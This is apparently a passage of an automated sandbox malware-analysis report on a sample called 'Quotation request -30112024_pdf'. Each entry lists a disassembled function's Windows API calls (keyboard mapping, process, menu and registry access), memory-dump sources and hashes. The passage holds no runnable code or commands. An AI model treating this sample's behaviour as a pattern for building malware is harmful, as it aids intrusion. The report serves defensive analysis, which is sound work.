                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                    • String ID:
                                                                    • API String ID: 3495660284-0
                                                                    • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                    • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                    • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                    • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                    Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual
                                                                    • String ID:
                                                                    • API String ID: 4278518827-0
                                                                    • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                    • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                    • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                    • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                    Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                    • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                    • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                    • ExitThread.KERNEL32 ref: 004151ED
                                                                    • __freefls@4.LIBCMT ref: 00415209
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                    • String ID:
                                                                    • API String ID: 442100245-0
                                                                    • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                    • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                    • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                    • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                    Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                    • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                    • _wcslen.LIBCMT ref: 0045F94A
                                                                    • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                    • String ID: 0
                                                                    • API String ID: 621800784-4108050209
                                                                    • Opcode ID: 81ac811d22c35f9fa91ba742b1be7df183685e8d6235a52bfd7a192db436f1c3
                                                                    • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                    • Opcode Fuzzy Hash: 81ac811d22c35f9fa91ba742b1be7df183685e8d6235a52bfd7a192db436f1c3
                                                                    • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                    Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • SetErrorMode.KERNEL32 ref: 004781CE
                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                    • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                    • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                    • String ID: \VH
                                                                    • API String ID: 3884216118-234962358
                                                                    • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                    • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                    • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                    • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                    Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                    • IsMenu.USER32(?), ref: 0044854D
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                    • DrawMenuBar.USER32 ref: 004485AF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                    • String ID: 0
                                                                    • API String ID: 3076010158-4108050209
                                                                    • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                    • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                    • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                    • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                    Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                    • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$_memmove_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 1589278365-1403004172
                                                                    • Opcode ID: 966fc813e999f16e9c1f6b2977c3504478baf210cbdd76e1ec7e477fd7150369
                                                                    • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                    • Opcode Fuzzy Hash: 966fc813e999f16e9c1f6b2977c3504478baf210cbdd76e1ec7e477fd7150369
                                                                    • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                    Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Handle
                                                                    • String ID: nul
                                                                    • API String ID: 2519475695-2873401336
                                                                    • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                    • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                    • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                    • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                    Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Handle
                                                                    • String ID: nul
                                                                    • API String ID: 2519475695-2873401336
                                                                    • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                    • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                    • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                    • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                    Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: SysAnimate32
                                                                    • API String ID: 0-1011021900
                                                                    • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                    • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                    • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                    • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                    Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                      • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                      • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                      • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                      • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                    • GetFocus.USER32 ref: 0046157B
                                                                      • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                      • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                    • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                    • __swprintf.LIBCMT ref: 00461608
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                    • String ID: %s%d
                                                                    • API String ID: 2645982514-1110647743
                                                                    • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                    • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                    • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                    • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                    Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                    • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                    • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                    • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                    Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                    • String ID:
                                                                    • API String ID: 3488606520-0
                                                                    • Opcode ID: 26153b84b5bd532cea053015d5cabd50dcff0e84e990c9f357f6b864eae744da
                                                                    • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                    • Opcode Fuzzy Hash: 26153b84b5bd532cea053015d5cabd50dcff0e84e990c9f357f6b864eae744da
                                                                    • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                    Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ConnectRegistry_memmove_wcslen
                                                                    • String ID:
                                                                    • API String ID: 15295421-0
                                                                    • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                    • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                    • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
